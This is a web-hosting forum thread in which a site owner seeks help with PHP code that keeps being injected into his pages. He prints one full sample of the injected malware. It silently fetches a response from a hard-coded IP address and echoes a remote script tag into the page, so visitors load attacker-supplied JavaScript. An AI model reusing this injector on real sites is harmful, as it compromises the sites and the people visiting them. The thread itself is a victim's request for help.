Badly need help stopping this malware from getting placed in

[senkin]

I have tried everything (even having a blank page as a website and deleted all of my other websites), and it still got injected!

This has been a problem for a long time now and I REALLY need some help.

It is clearly not a insecure code in my website since as I said I left one website up with a blank index.php and it still got in!

[joshh20]

If you believe that there is malware on your webhosting, it would likely be a good idea to send in a support ticket to let them know about this. I would advise backing up all of your documents and compressing them in a zip or tarball, copying them somewhere safe, run a virus scan on the files, and then wiping all of the files from your web servers.

[senkin]

I did all of that already and they told me to make a forum post.

[Edge100x]

If you have a completely wiped webhosting account, then whoever is editing it must have your FTP login and password. You should perform a full malware check of your personal computer, update your OS, confirm that your firewall is working properly, and then change all your passwords.

[senkin]

Is it that no one understands what I am saying? No one has wiped my webServer. They keep injecting code into my webpages even if it is a blank page. . No one has access I have reset the password several times I know I have no viruses on my computer. I have changed computers before. It is not a simple problem quick acting like it is please.

[senkin]

Here is an example of one kind of injected code. There has been many variations, but this should give you an idea.

Code: Select all

<?php
#c63448#
if (empty($jk)) {
    error_reporting(0);
    @ini_set('display_errors', 0);
    if (!function_exists('__url_get_contents')) {
        function __url_get_contents($remote_url, $timeout)
        {
            if (function_exists('curl_exec')) {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, $remote_url);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
                curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
                $_url_get_contents_data = curl_exec($ch);
                curl_close($ch);
            } elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen')) {
                $ctx = @stream_context_create(array('http' =>
                    array(
                        'timeout' => $timeout,
                    )
                ));
                $_url_get_contents_data = @file_get_contents($remote_url, false, $ctx);
            } elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
                $handle = @fopen($remote_url, "r");
                $_url_get_contents_data = @stream_get_contents($handle);
            } else {
                $_url_get_contents_data = __file_get_url_contents($remote_url);
            }
            return $_url_get_contents_data;
        }
    }
    if (!function_exists('__file_get_url_contents')) {
        function __file_get_url_contents($remote_url)
        {
            if (preg_match('/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',
                $remote_url, $matches)
            ) {
                $protocol = strtolower($matches[1]);
                $host = $matches[2];
                $path = $matches[3];
            } else {
                // Bad remote_url-format
                return FALSE;
            }
            if ($protocol == "http") {
                $socket = @fsockopen($host, 80, $errno, $errstr, $timeout);
            } else {
                // Bad protocol
                return FALSE;
            }
            if (!$socket) {
                // Error creating socket
                return FALSE;
            }
            $request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
            $len_written = @fwrite($socket, $request);
            if ($len_written === FALSE || $len_written != strlen($request)) {
                // Error sending request
                return FALSE;
            }
            $response = "";
            while (!@feof($socket) &&
                ($buf = @fread($socket, 4096)) !== FALSE) {
                $response .= $buf;
            }
            if ($buf === FALSE) {
                // Error reading response
                return FALSE;
            }
            $end_of_header = strpos($response, "\r\n\r\n");
            return substr($response, $end_of_header + 4);
        }
    }
    if (empty($__var_to_echo) && empty($remote_domain)) {
        $jk = "http://46.244.10.234/b2.php";
        $jk = __url_get_contents($jk, 1);
        if (strpos($jk, 'http://') === 0) {
            $__var_to_echo = '<script type="text/javascript" src="' . $jk . '?id=85335277"></script>';
            echo $__var_to_echo;
        }
    }
}
#/c63448#
?>
<?php

?>
<?php

?>
<?php

?>
<?php

?>

[rymax99]

Your site is most likely running vulnerable code. What services do you run, forum software, custom panels, etc?

[senkin]

All I have done is used PHP to read from GET to tell the website what page to pull from. This way I could have a pages folder and put all my content pages in that pages folder (home, contact, about, etc) and just have the header and footer in that one index.php with PHP telling index.php which "content page" to load based off the GET variable set (I named mine p). An example would be http://webpage.com/?p=contact and that would make it so it would load the contact content from /pages/contact.php by doing include $page; Of course I made sure to do it as securely as possible, but no matter what it still causes this malware to get put in.

What bothers me most is that I have done this EXACT same code (listed below) on another webhost (to test this problem), and after a month I did not have a single issue.

Code: Select all

<?php
	if (strpos($_GET['p'], '.') !== false) { echo 'Either you are trying to hack with breakout, or you made a mistake. Either way, you need to try again'; }
    if ($_GET['p'] == "" || $_GET['p'] == "home") { $targetfile = 'home.php'; } else { $targetfile = $_GET['p'].'.php'; }						
    $sdir = $_SERVER['DOCUMENT_ROOT'].'/pages/';
    $filenames = scandir($sdir, 1);
	ob_start();
    if (in_array($targetfile,$filenames)) {
    	if ($_GET['p'] == "sendmail") { include "./libs/sendmail.php"; } else { include $sdir.$targetfile; }
    } else { 
    	include $sdir.'404.php'; 
    }
	$included_page = ob_get_clean();
?>

[.=QUACK=.Major.Pain]

So how your login credentials were probably stolen.
Change your password for starters, and make it as complicated as possible.
Use some CAPS, odd characters like $%^&! and mix them all up.

[senkin]

So how your login credentials were probably stolen.
Change your password for starters, and make it as complicated as possible.
Use some CAPS, odd characters like $%^&! and mix them all up.

Did that already sir, but thanks for trying to help.